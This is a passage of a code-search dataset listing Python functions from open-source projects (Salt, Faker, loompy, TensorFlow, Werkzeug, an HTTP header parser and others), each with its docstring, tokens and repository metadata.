Dataset columns (name: type, observed range per the viewer header):
repo: string (length 7-55)
path: string (length 4-223)
url: string (length 87-315)
code: string (length 75-104k)
code_tokens: list
docstring: string (length 1-46.9k)
docstring_tokens: list
language: string (1 distinct value)
partition: string (3 distinct values)
avg_line_len: float64 (7.91-980)
saltstack/salt
salt/tokens/localfs.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/tokens/localfs.py#L75-L88
def rm_token(opts, tok):
    '''
    Remove token from the store.

    :param opts: Salt master config options
    :param tok: Token to remove
    :returns: Empty dict if successful. None if failed.
    '''
    t_path = os.path.join(opts['token_dir'], tok)
    try:
        os.remove(t_path)
        return {}
    except (IOError, OSError):
        log.warning('Could not remove token %s', tok)
[ "def", "rm_token", "(", "opts", ",", "tok", ")", ":", "t_path", "=", "os", ".", "path", ".", "join", "(", "opts", "[", "'token_dir'", "]", ",", "tok", ")", "try", ":", "os", ".", "remove", "(", "t_path", ")", "return", "{", "}", "except", "(", "IOError", ",", "OSError", ")", ":", "log", ".", "warning", "(", "'Could not remove token %s'", ",", "tok", ")" ]
Remove token from the store. :param opts: Salt master config options :param tok: Token to remove :returns: Empty dict if successful. None if failed.
[ "Remove", "token", "from", "the", "store", "." ]
python
train
27.214286
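A minimal driver sketch for the rm_token entry above. The import path is inferred from the record's path field, and the opts dict and token value are made up for illustration; a real Salt master passes its own config options.

# Hypothetical exercise of rm_token; token_dir and tok are invented here.
import os
import tempfile

from salt.tokens.localfs import rm_token  # module name assumed from the path field above

token_dir = tempfile.mkdtemp()
tok = 'deadbeef'
open(os.path.join(token_dir, tok), 'w').close()   # create a dummy token file

opts = {'token_dir': token_dir}                   # minimal stand-in for master opts
assert rm_token(opts, tok) == {}                  # {} on success, None if removal failed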
bitesofcode/projexui
projexui/widgets/xtreewidget/xtreewidgetdelegate.py
https://github.com/bitesofcode/projexui/blob/f18a73bec84df90b034ca69b9deea118dbedfc4d/projexui/widgets/xtreewidget/xtreewidgetdelegate.py#L167-L180
def drawBackground( self, painter, opt, rect, brush ):
    """
    Make sure the background extends to 0 for the first item.

    :param      painter | <QtGui.QPainter>
                rect    | <QtCore.QRect>
                brush   | <QtGui.QBrush>
    """
    if not brush:
        return

    painter.setPen(QtCore.Qt.NoPen)
    painter.setBrush(brush)
    painter.drawRect(rect)
[ "def", "drawBackground", "(", "self", ",", "painter", ",", "opt", ",", "rect", ",", "brush", ")", ":", "if", "not", "brush", ":", "return", "painter", ".", "setPen", "(", "QtCore", ".", "Qt", ".", "NoPen", ")", "painter", ".", "setBrush", "(", "brush", ")", "painter", ".", "drawRect", "(", "rect", ")" ]
Make sure the background extends to 0 for the first item. :param painter | <QtGui.QPainter> rect | <QtCore.QRect> brush | <QtGui.QBrush>
[ "Make", "sure", "the", "background", "extends", "to", "0", "for", "the", "first", "item", ".", ":", "param", "painter", "|", "<QtGui", ".", "QPainter", ">", "rect", "|", "<QtCore", ".", "QRect", ">", "brush", "|", "<QtGui", ".", "QBrush", ">" ]
python
train
31.642857
joke2k/faker
faker/providers/__init__.py
https://github.com/joke2k/faker/blob/965824b61132e52d92d1a6ce470396dbbe01c96c/faker/providers/__init__.py#L121-L129
def random_digit_or_empty(self):
    """
    Returns a random digit/number between 0 and 9 or an empty string.
    """
    if self.generator.random.randint(0, 1):
        return self.generator.random.randint(0, 9)
    else:
        return ''
[ "def", "random_digit_or_empty", "(", "self", ")", ":", "if", "self", ".", "generator", ".", "random", ".", "randint", "(", "0", ",", "1", ")", ":", "return", "self", ".", "generator", ".", "random", ".", "randint", "(", "0", ",", "9", ")", "else", ":", "return", "''" ]
Returns a random digit/number between 0 and 9 or an empty string.
[ "Returns", "a", "random", "digit", "/", "number", "between", "0", "and", "9", "or", "an", "empty", "string", "." ]
python
train
29.888889
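A short usage sketch for the entry above: Faker exposes its BaseProvider methods on the Faker instance, so the method can be called directly; the exact distribution of the output is what the docstring describes (roughly half ints, half empty strings).

# Minimal sketch exercising random_digit_or_empty through a Faker instance.
from faker import Faker

fake = Faker()
samples = [fake.random_digit_or_empty() for _ in range(10)]
# Roughly half the samples are ints in 0..9 and half are '' (empty string).
print(samples)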
Kortemme-Lab/klab
klab/rosetta/input_files.py
https://github.com/Kortemme-Lab/klab/blob/6d410ad08f1bd9f7cbbb28d7d946e94fbaaa2b6b/klab/rosetta/input_files.py#L129-L169
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None):
    '''Returns a list of segments (pairs of start and end positions) based on the loop definitions.
       The returned segments merge overlapping loops e.g. if the loops file contains sections
       32-40, 23-30, 28-33, and 43-46 then the returned segments will be [(23, 40), (43, 46)].
       This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.

       The offsets are used to select the residues surrounding the loop regions. For example,
       i.e. if a sequence segment is 7 residues long at positions 13-19 and we require 9-mers,
       we must consider the segment from positions 5-27 so that all possible 9-mers are considered.
    '''

    # Create a unique, sorted list of all loop terminus positions
    positions = set()
    for l in self.data:
        assert(l['start'] <= l['end'])
        if sequence_length:
            # If we know the sequence length then we can return valid positions
            positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1)))  # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
        else:
            # Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully
            positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1))  # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
    positions = sorted(positions)

    # Iterate through the list to define the segments
    segments = []
    current_start = None
    last_position = None
    for p in positions:
        if current_start == None:
            current_start = p
            last_position = p
        else:
            if p == last_position + 1:
                last_position = p
            else:
                segments.append((current_start, last_position))
                current_start = p
                last_position = p
    if current_start and last_position:
        segments.append((current_start, last_position))
    return segments
[ "def", "get_distinct_segments", "(", "self", ",", "left_offset", "=", "0", ",", "right_offset", "=", "0", ",", "sequence_length", "=", "None", ")", ":", "# Create a unique, sorted list of all loop terminus positions", "positions", "=", "set", "(", ")", "for", "l", "in", "self", ".", "data", ":", "assert", "(", "l", "[", "'start'", "]", "<=", "l", "[", "'end'", "]", ")", "if", "sequence_length", ":", "# If we know the sequence length then we can return valid positions", "positions", "=", "positions", ".", "union", "(", "range", "(", "max", "(", "1", ",", "l", "[", "'start'", "]", "-", "left_offset", "+", "1", ")", ",", "min", "(", "sequence_length", "+", "1", ",", "l", "[", "'end'", "]", "+", "1", "+", "right_offset", "-", "1", ")", ")", ")", "# For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.", "else", ":", "# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully", "positions", "=", "positions", ".", "union", "(", "range", "(", "max", "(", "1", ",", "l", "[", "'start'", "]", "-", "left_offset", "+", "1", ")", ",", "l", "[", "'end'", "]", "+", "1", "+", "right_offset", "-", "1", ")", ")", "# For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.", "positions", "=", "sorted", "(", "positions", ")", "# Iterate through the list to define the segments", "segments", "=", "[", "]", "current_start", "=", "None", "last_position", "=", "None", "for", "p", "in", "positions", ":", "if", "current_start", "==", "None", ":", "current_start", "=", "p", "last_position", "=", "p", "else", ":", "if", "p", "==", "last_position", "+", "1", ":", "last_position", "=", "p", "else", ":", "segments", ".", "append", "(", "(", "current_start", ",", "last_position", ")", ")", "current_start", "=", "p", "last_position", "=", "p", "if", "current_start", "and", "last_position", ":", "segments", ".", "append", "(", "(", "current_start", ",", "last_position", ")", ")", "return", "segments" ]
Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned segments will be [(23, 40), (43, 46)]. This may not be the fastest way to calculate this (numpy?) but that is probably not an issue. The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so that all possible 9-mers are considered.
[ "Returns", "a", "list", "of", "segments", "(", "pairs", "of", "start", "and", "end", "positions", ")", "based", "on", "the", "loop", "definitions", ".", "The", "returned", "segments", "merge", "overlapping", "loops", "e", ".", "g", ".", "if", "the", "loops", "file", "contains", "sections", "32", "-", "40", "23", "-", "30", "28", "-", "33", "and", "43", "-", "46", "then", "the", "returned", "segments", "will", "be", "[", "(", "23", "40", ")", "(", "43", "46", ")", "]", ".", "This", "may", "not", "be", "the", "fastest", "way", "to", "calculate", "this", "(", "numpy?", ")", "but", "that", "is", "probably", "not", "an", "issue", "." ]
python
train
63.634146
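The merge behaviour described in the docstring above can be reproduced with a stripped-down, standalone sketch: offsets and the class's self.data structure are dropped, and loops are plain (start, end) tuples. This is an illustration of the same idea, not the library's API.

# Standalone sketch of the segment-merging idea from the entry above.
def merge_loops(loops):
    positions = set()
    for start, end in loops:
        positions.update(range(start, end + 1))
    segments, current, last = [], None, None
    for p in sorted(positions):
        if current is None:
            current = last = p
        elif p == last + 1:
            last = p
        else:
            segments.append((current, last))
            current = last = p
    if current is not None:
        segments.append((current, last))
    return segments

print(merge_loops([(32, 40), (23, 30), (28, 33), (43, 46)]))  # [(23, 40), (43, 46)]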
linnarsson-lab/loompy
loompy/loompy.py
https://github.com/linnarsson-lab/loompy/blob/62c8373a92b058753baa3a95331fb541f560f599/loompy/loompy.py#L531-L545
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None:
    """
    **DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
    """
    deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead")
    try:
        g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis]))
    except Exception:
        raise ValueError("Input arrays could not be converted to a sparse matrix")
    if axis == 0:
        self.row_graphs[name] = g
    elif axis == 1:
        self.col_graphs[name] = g
    else:
        raise ValueError("axis must be 0 (rows) or 1 (columns)")
[ "def", "set_edges", "(", "self", ",", "name", ":", "str", ",", "a", ":", "np", ".", "ndarray", ",", "b", ":", "np", ".", "ndarray", ",", "w", ":", "np", ".", "ndarray", ",", "*", ",", "axis", ":", "int", ")", "->", "None", ":", "deprecated", "(", "\"'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead\"", ")", "try", ":", "g", "=", "scipy", ".", "sparse", ".", "coo_matrix", "(", "(", "w", ",", "(", "a", ",", "b", ")", ")", ",", "(", "self", ".", "shape", "[", "axis", "]", ",", "self", ".", "shape", "[", "axis", "]", ")", ")", "except", "Exception", ":", "raise", "ValueError", "(", "\"Input arrays could not be converted to a sparse matrix\"", ")", "if", "axis", "==", "0", ":", "self", ".", "row_graphs", "[", "name", "]", "=", "g", "elif", "axis", "==", "1", ":", "self", ".", "col_graphs", "[", "name", "]", "=", "g", "else", ":", "raise", "ValueError", "(", "\"axis must be 0 (rows) or 1 (columns)\"", ")" ]
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
[ "**", "DEPRECATED", "**", "-", "Use", "ds", ".", "row_graphs", "[", "name", "]", "=", "g", "or", "ds", ".", "col_graphs", "[", "name", "]", "=", "g", "instead" ]
python
train
42.6
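A small sketch of the sparse-graph construction that set_edges performs internally: edge lists (a, b) with weights w become a COO adjacency matrix. The arrays and size below are invented; with a real LoomConnection ds the non-deprecated form recommended by the docstring would be ds.row_graphs[name] = g or ds.col_graphs[name] = g.

# Building the COO graph exactly as the method does, with made-up arrays.
import numpy as np
import scipy.sparse

a = np.array([0, 1, 2])          # source vertices
b = np.array([1, 2, 0])          # target vertices
w = np.array([0.5, 1.0, 0.25])   # edge weights
n = 3                            # graph size along the chosen axis

g = scipy.sparse.coo_matrix((w, (a, b)), (n, n))
print(g.toarray())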
splitkeycoffee/pyhottop
pyhottop/pyhottop.py
https://github.com/splitkeycoffee/pyhottop/blob/2986bbb2d848f7e41fa3ece5ebb1b33c8882219c/pyhottop/pyhottop.py#L195-L217
def _validate_checksum(self, buffer):
    """Validate the buffer response against the checksum.

    When reading the serial interface, data will come back in a raw format
    with an included checksum process.

    :returns: bool
    """
    self._log.debug("Validating the buffer")
    if len(buffer) == 0:
        self._log.debug("Buffer was empty")
        if self._conn.isOpen():
            self._log.debug('Closing connection')
            self._conn.close()
        return False
    p0 = hex2int(buffer[0])
    p1 = hex2int(buffer[1])
    checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF
    p35 = hex2int(buffer[35])
    if p0 != 165 or p1 != 150 or p35 != checksum:
        self._log.debug("Buffer checksum was not valid")
        return False
    return True
[ "def", "_validate_checksum", "(", "self", ",", "buffer", ")", ":", "self", ".", "_log", ".", "debug", "(", "\"Validating the buffer\"", ")", "if", "len", "(", "buffer", ")", "==", "0", ":", "self", ".", "_log", ".", "debug", "(", "\"Buffer was empty\"", ")", "if", "self", ".", "_conn", ".", "isOpen", "(", ")", ":", "self", ".", "_log", ".", "debug", "(", "'Closing connection'", ")", "self", ".", "_conn", ".", "close", "(", ")", "return", "False", "p0", "=", "hex2int", "(", "buffer", "[", "0", "]", ")", "p1", "=", "hex2int", "(", "buffer", "[", "1", "]", ")", "checksum", "=", "sum", "(", "[", "hex2int", "(", "c", ")", "for", "c", "in", "buffer", "[", ":", "35", "]", "]", ")", "&", "0xFF", "p35", "=", "hex2int", "(", "buffer", "[", "35", "]", ")", "if", "p0", "!=", "165", "or", "p1", "!=", "150", "or", "p35", "!=", "checksum", ":", "self", ".", "_log", ".", "debug", "(", "\"Buffer checksum was not valid\"", ")", "return", "False", "return", "True" ]
Validate the buffer response against the checksum. When reading the serial interface, data will come back in a raw format with an included checksum process. :returns: bool
[ "Validate", "the", "buffer", "response", "against", "the", "checksum", "." ]
python
train
36.304348
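A standalone illustration of the checksum rule used above, working on a made-up byte frame rather than the roaster's serial buffer: byte 35 must equal the low byte of the sum of bytes 0..34, and the frame must start with 0xA5 0x96 (165, 150).

# Invented 36-byte frame with a valid header and checksum.
frame = bytearray([0xA5, 0x96] + [0x00] * 33)   # 35 header/payload bytes
frame.append(sum(frame[:35]) & 0xFF)            # append the checksum byte

assert frame[0] == 165 and frame[1] == 150
assert frame[35] == sum(frame[:35]) & 0xFF      # same comparison the method makes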
nicferrier/pyproxyfs
src/pyproxyfs/__init__.py
https://github.com/nicferrier/pyproxyfs/blob/7db09bb07bdeece56b7b1c4bf78c9f0b0a03c14b/src/pyproxyfs/__init__.py#L51-L63
def _mergedict(a, b):
    """Recusively merge the 2 dicts.

    Destructive on argument 'a'.
    """
    for p, d1 in b.items():
        if p in a:
            if not isinstance(d1, dict):
                continue
            _mergedict(a[p], d1)
        else:
            a[p] = d1
    return a
[ "def", "_mergedict", "(", "a", ",", "b", ")", ":", "for", "p", ",", "d1", "in", "b", ".", "items", "(", ")", ":", "if", "p", "in", "a", ":", "if", "not", "isinstance", "(", "d1", ",", "dict", ")", ":", "continue", "_mergedict", "(", "a", "[", "p", "]", ",", "d1", ")", "else", ":", "a", "[", "p", "]", "=", "d1", "return", "a" ]
Recusively merge the 2 dicts. Destructive on argument 'a'.
[ "Recusively", "merge", "the", "2", "dicts", "." ]
python
test
21.769231
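A quick demonstration of the recursive merge above, assuming the helper is importable from the pyproxyfs package named in the path field (it lives in the package __init__); the two dicts are invented and, as the docstring warns, the first argument is mutated in place.

# Hypothetical call; input dicts are made up.
from pyproxyfs import _mergedict  # import path assumed from the record above

a = {'etc': {'passwd': 'root:0', 'group': ''}, 'tmp': {}}
b = {'etc': {'hosts': '127.0.0.1 localhost'}, 'var': {'log': {}}}

_mergedict(a, b)
print(a)
# {'etc': {'passwd': 'root:0', 'group': '', 'hosts': '127.0.0.1 localhost'},
#  'tmp': {}, 'var': {'log': {}}}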
tensorflow/tensor2tensor
tensor2tensor/models/slicenet.py
https://github.com/tensorflow/tensor2tensor/blob/272500b6efe353aeb638d2745ed56e519462ca31/tensor2tensor/models/slicenet.py#L175-L212
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams):
    """Middle part of slicenet, connecting encoder and decoder."""

    def norm_fn(x, name):
        with tf.variable_scope(name, default_name="norm"):
            return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size,
                                            hparams.norm_epsilon)

    # Flatten targets and embed target_space_id.
    targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2)
    target_space_emb = tf.tile(target_space_emb,
                               [tf.shape(targets_flat)[0], 1, 1, 1])

    # Use attention from each target to look at input and retrieve.
    targets_shifted = common_layers.shift_right(
        targets_flat, pad_value=target_space_emb)
    if hparams.attention_type == "none":
        targets_with_attention = tf.zeros_like(targets_shifted)
    else:
        inputs_padding_bias = (1.0 - mask) * -1e9  # Bias to not attend to padding.
        targets_with_attention = attention(
            targets_shifted, inputs_encoded, norm_fn, hparams,
            bias=inputs_padding_bias)

    # Positional targets: merge attention and raw.
    kernel = (hparams.kernel_height, hparams.kernel_width)
    targets_merged = common_layers.subseparable_conv_block(
        tf.concat([targets_with_attention, targets_shifted], axis=3),
        hparams.hidden_size, [((1, 1), kernel)],
        normalizer_fn=norm_fn,
        padding="LEFT",
        separability=4,
        name="targets_merge")

    return targets_merged, 0.0
[ "def", "slicenet_middle", "(", "inputs_encoded", ",", "targets", ",", "target_space_emb", ",", "mask", ",", "hparams", ")", ":", "def", "norm_fn", "(", "x", ",", "name", ")", ":", "with", "tf", ".", "variable_scope", "(", "name", ",", "default_name", "=", "\"norm\"", ")", ":", "return", "common_layers", ".", "apply_norm", "(", "x", ",", "hparams", ".", "norm_type", ",", "hparams", ".", "hidden_size", ",", "hparams", ".", "norm_epsilon", ")", "# Flatten targets and embed target_space_id.", "targets_flat", "=", "tf", ".", "expand_dims", "(", "common_layers", ".", "flatten4d3d", "(", "targets", ")", ",", "axis", "=", "2", ")", "target_space_emb", "=", "tf", ".", "tile", "(", "target_space_emb", ",", "[", "tf", ".", "shape", "(", "targets_flat", ")", "[", "0", "]", ",", "1", ",", "1", ",", "1", "]", ")", "# Use attention from each target to look at input and retrieve.", "targets_shifted", "=", "common_layers", ".", "shift_right", "(", "targets_flat", ",", "pad_value", "=", "target_space_emb", ")", "if", "hparams", ".", "attention_type", "==", "\"none\"", ":", "targets_with_attention", "=", "tf", ".", "zeros_like", "(", "targets_shifted", ")", "else", ":", "inputs_padding_bias", "=", "(", "1.0", "-", "mask", ")", "*", "-", "1e9", "# Bias to not attend to padding.", "targets_with_attention", "=", "attention", "(", "targets_shifted", ",", "inputs_encoded", ",", "norm_fn", ",", "hparams", ",", "bias", "=", "inputs_padding_bias", ")", "# Positional targets: merge attention and raw.", "kernel", "=", "(", "hparams", ".", "kernel_height", ",", "hparams", ".", "kernel_width", ")", "targets_merged", "=", "common_layers", ".", "subseparable_conv_block", "(", "tf", ".", "concat", "(", "[", "targets_with_attention", ",", "targets_shifted", "]", ",", "axis", "=", "3", ")", ",", "hparams", ".", "hidden_size", ",", "[", "(", "(", "1", ",", "1", ")", ",", "kernel", ")", "]", ",", "normalizer_fn", "=", "norm_fn", ",", "padding", "=", "\"LEFT\"", ",", "separability", "=", "4", ",", "name", "=", "\"targets_merge\"", ")", "return", "targets_merged", ",", "0.0" ]
Middle part of slicenet, connecting encoder and decoder.
[ "Middle", "part", "of", "slicenet", "connecting", "encoder", "and", "decoder", "." ]
python
train
39
limodou/uliweb
uliweb/lib/werkzeug/wrappers.py
https://github.com/limodou/uliweb/blob/34472f25e4bc0b954a35346672f94e84ef18b076/uliweb/lib/werkzeug/wrappers.py#L288-L310
def _get_file_stream(self, total_content_length, content_type, filename=None,
                     content_length=None):
    """Called to get a stream for the file upload.

    This must provide a file-like class with `read()`, `readline()`
    and `seek()` methods that is both writeable and readable.

    The default implementation returns a temporary file if the total
    content length is higher than 500KB.  Because many browsers do not
    provide a content length for the files only the total content
    length matters.

    :param total_content_length: the total content length of all the
                                 data in the request combined.  This value
                                 is guaranteed to be there.
    :param content_type: the mimetype of the uploaded file.
    :param filename: the filename of the uploaded file.  May be `None`.
    :param content_length: the length of this file.  This value is usually
                           not provided because webbrowsers do not provide
                           this value.
    """
    return default_stream_factory(total_content_length, content_type,
                                  filename, content_length)
[ "def", "_get_file_stream", "(", "self", ",", "total_content_length", ",", "content_type", ",", "filename", "=", "None", ",", "content_length", "=", "None", ")", ":", "return", "default_stream_factory", "(", "total_content_length", ",", "content_type", ",", "filename", ",", "content_length", ")" ]
Called to get a stream for the file upload. This must provide a file-like class with `read()`, `readline()` and `seek()` methods that is both writeable and readable. The default implementation returns a temporary file if the total content length is higher than 500KB. Because many browsers do not provide a content length for the files only the total content length matters. :param total_content_length: the total content length of all the data in the request combined. This value is guaranteed to be there. :param content_type: the mimetype of the uploaded file. :param filename: the filename of the uploaded file. May be `None`. :param content_length: the length of this file. This value is usually not provided because webbrowsers do not provide this value.
[ "Called", "to", "get", "a", "stream", "for", "the", "file", "upload", "." ]
python
train
54.173913
onenameio/onename-python
onename/client.py
https://github.com/onenameio/onename-python/blob/74c583282f18ad9582c6b57b826126d045321494/onename/client.py#L142-L172
def update_user(self, username, profile, owner_privkey):
    """ Update profile_hash on blockchain
    """
    url = self.base_url + "/users/" + username + "/update"

    owner_pubkey = get_pubkey_from_privkey(owner_privkey)

    payload = {
        'profile': profile,
        'owner_pubkey': owner_pubkey
    }

    resp = self._post_request(url, payload)

    try:
        unsigned_tx = resp['unsigned_tx']
    except:
        return resp

    dht_resp = write_dht_profile(profile)

    dht_resp = dht_resp[0]
    if not dht_resp['status'] == 'success':
        return {"error": "DHT write failed"}

    # sign all unsigned inputs
    signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx)

    return self.broadcast_transaction(signed_tx)
[ "def", "update_user", "(", "self", ",", "username", ",", "profile", ",", "owner_privkey", ")", ":", "url", "=", "self", ".", "base_url", "+", "\"/users/\"", "+", "username", "+", "\"/update\"", "owner_pubkey", "=", "get_pubkey_from_privkey", "(", "owner_privkey", ")", "payload", "=", "{", "'profile'", ":", "profile", ",", "'owner_pubkey'", ":", "owner_pubkey", "}", "resp", "=", "self", ".", "_post_request", "(", "url", ",", "payload", ")", "try", ":", "unsigned_tx", "=", "resp", "[", "'unsigned_tx'", "]", "except", ":", "return", "resp", "dht_resp", "=", "write_dht_profile", "(", "profile", ")", "dht_resp", "=", "dht_resp", "[", "0", "]", "if", "not", "dht_resp", "[", "'status'", "]", "==", "'success'", ":", "return", "{", "\"error\"", ":", "\"DHT write failed\"", "}", "# sign all unsigned inputs", "signed_tx", "=", "sign_all_unsigned_inputs", "(", "owner_privkey", ",", "unsigned_tx", ")", "return", "self", ".", "broadcast_transaction", "(", "signed_tx", ")" ]
Update profile_hash on blockchain
[ "Update", "profile_hash", "on", "blockchain" ]
python
train
26.419355
ianepperson/pyredminews
redmine/redmine_rest.py
https://github.com/ianepperson/pyredminews/blob/b2b0581483632738a3acca3b4e093c181847b813/redmine/redmine_rest.py#L548-L555
def update(self, id, **dict):
    '''Update a given item with the passed data.'''
    if not self._item_path:
        raise AttributeError('update is not available for %s' % self._item_name)
    target = (self._update_path or self._item_path) % id
    payload = json.dumps({self._item_type:dict})
    self._redmine.put(target, payload)
    return None
[ "def", "update", "(", "self", ",", "id", ",", "*", "*", "dict", ")", ":", "if", "not", "self", ".", "_item_path", ":", "raise", "AttributeError", "(", "'update is not available for %s'", "%", "self", ".", "_item_name", ")", "target", "=", "(", "self", ".", "_update_path", "or", "self", ".", "_item_path", ")", "%", "id", "payload", "=", "json", ".", "dumps", "(", "{", "self", ".", "_item_type", ":", "dict", "}", ")", "self", ".", "_redmine", ".", "put", "(", "target", ",", "payload", ")", "return", "None" ]
Update a given item with the passed data.
[ "Update", "a", "given", "item", "with", "the", "passed", "data", "." ]
python
train
46.5
SeattleTestbed/seash
pyreadline/rlmain.py
https://github.com/SeattleTestbed/seash/blob/40f9d2285662ff8b61e0468b4196acee089b273b/pyreadline/rlmain.py#L432-L441
def _bell(self):
    u'''ring the bell if requested.'''
    if self.bell_style == u'none':
        pass
    elif self.bell_style == u'visible':
        raise NotImplementedError(u"Bellstyle visible is not implemented yet.")
    elif self.bell_style == u'audible':
        self.console.bell()
    else:
        raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style)
[ "def", "_bell", "(", "self", ")", ":", "if", "self", ".", "bell_style", "==", "u'none'", ":", "pass", "elif", "self", ".", "bell_style", "==", "u'visible'", ":", "raise", "NotImplementedError", "(", "u\"Bellstyle visible is not implemented yet.\"", ")", "elif", "self", ".", "bell_style", "==", "u'audible'", ":", "self", ".", "console", ".", "bell", "(", ")", "else", ":", "raise", "ReadlineError", "(", "u\"Bellstyle %s unknown.\"", "%", "self", ".", "bell_style", ")" ]
u'''ring the bell if requested.
[ "u", "ring", "the", "bell", "if", "requested", "." ]
python
train
39.8
JarryShaw/PyPCAPKit
src/protocols/application/httpv1.py
https://github.com/JarryShaw/PyPCAPKit/blob/c7f0da9aebc2cf210bf8f8b912f7d3cbb98ca10e/src/protocols/application/httpv1.py#L127-L184
def _read_http_header(self, header):
    """Read HTTP/1.* header.

    Structure of HTTP/1.* header [RFC 7230]:
        start-line :==: request-line / status-line
        request-line :==: method SP request-target SP HTTP-version CRLF
        status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
        header-field :==: field-name ":" OWS field-value OWS
    """
    try:
        startline, headerfield = header.split(b'\r\n', 1)
        para1, para2, para3 = re.split(rb'\s+', startline, 2)
        fields = headerfield.split(b'\r\n')
        lists = (re.split(rb'\s*:\s*', field, 1) for field in fields)
    except ValueError:
        raise ProtocolError('HTTP: invalid format', quiet=True)

    match1 = re.match(_RE_METHOD, para1)
    match2 = re.match(_RE_VERSION, para3)
    match3 = re.match(_RE_VERSION, para1)
    match4 = re.match(_RE_STATUS, para2)
    if match1 and match2:
        receipt = 'request'
        header = dict(
            request=dict(
                method=self.decode(para1),
                target=self.decode(para2),
                version=self.decode(match2.group('version')),
            ),
        )
    elif match3 and match4:
        receipt = 'response'
        header = dict(
            response=dict(
                version=self.decode(match3.group('version')),
                status=int(para2),
                phrase=self.decode(para3),
            ),
        )
    else:
        raise ProtocolError('HTTP: invalid format', quiet=True)

    try:
        for item in lists:
            key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field')
            value = self.decode(item[1].strip())
            if key in header:
                if isinstance(header[key], tuple):
                    header[key] += (value,)
                else:
                    header[key] = (header[key], value)
            else:
                header[key] = value
    except IndexError:
        raise ProtocolError('HTTP: invalid format', quiet=True)

    return header, receipt
[ "def", "_read_http_header", "(", "self", ",", "header", ")", ":", "try", ":", "startline", ",", "headerfield", "=", "header", ".", "split", "(", "b'\\r\\n'", ",", "1", ")", "para1", ",", "para2", ",", "para3", "=", "re", ".", "split", "(", "rb'\\s+'", ",", "startline", ",", "2", ")", "fields", "=", "headerfield", ".", "split", "(", "b'\\r\\n'", ")", "lists", "=", "(", "re", ".", "split", "(", "rb'\\s*:\\s*'", ",", "field", ",", "1", ")", "for", "field", "in", "fields", ")", "except", "ValueError", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "match1", "=", "re", ".", "match", "(", "_RE_METHOD", ",", "para1", ")", "match2", "=", "re", ".", "match", "(", "_RE_VERSION", ",", "para3", ")", "match3", "=", "re", ".", "match", "(", "_RE_VERSION", ",", "para1", ")", "match4", "=", "re", ".", "match", "(", "_RE_STATUS", ",", "para2", ")", "if", "match1", "and", "match2", ":", "receipt", "=", "'request'", "header", "=", "dict", "(", "request", "=", "dict", "(", "method", "=", "self", ".", "decode", "(", "para1", ")", ",", "target", "=", "self", ".", "decode", "(", "para2", ")", ",", "version", "=", "self", ".", "decode", "(", "match2", ".", "group", "(", "'version'", ")", ")", ",", ")", ",", ")", "elif", "match3", "and", "match4", ":", "receipt", "=", "'response'", "header", "=", "dict", "(", "response", "=", "dict", "(", "version", "=", "self", ".", "decode", "(", "match3", ".", "group", "(", "'version'", ")", ")", ",", "status", "=", "int", "(", "para2", ")", ",", "phrase", "=", "self", ".", "decode", "(", "para3", ")", ",", ")", ",", ")", "else", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "try", ":", "for", "item", "in", "lists", ":", "key", "=", "self", ".", "decode", "(", "item", "[", "0", "]", ".", "strip", "(", ")", ")", ".", "replace", "(", "receipt", ",", "f'{receipt}_field'", ")", "value", "=", "self", ".", "decode", "(", "item", "[", "1", "]", ".", "strip", "(", ")", ")", "if", "key", "in", "header", ":", "if", "isinstance", "(", "header", "[", "key", "]", ",", "tuple", ")", ":", "header", "[", "key", "]", "+=", "(", "value", ",", ")", "else", ":", "header", "[", "key", "]", "=", "(", "header", "[", "key", "]", ",", "value", ")", "else", ":", "header", "[", "key", "]", "=", "value", "except", "IndexError", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "return", "header", ",", "receipt" ]
Read HTTP/1.* header. Structure of HTTP/1.* header [RFC 7230]: start-line :==: request-line / status-line request-line :==: method SP request-target SP HTTP-version CRLF status-line :==: HTTP-version SP status-code SP reason-phrase CRLF header-field :==: field-name ":" OWS field-value OWS
[ "Read", "HTTP", "/", "1", ".", "*", "header", "." ]
python
train
38.224138
jason-weirather/py-seq-tools
seqtools/format/sam/bam/files.py
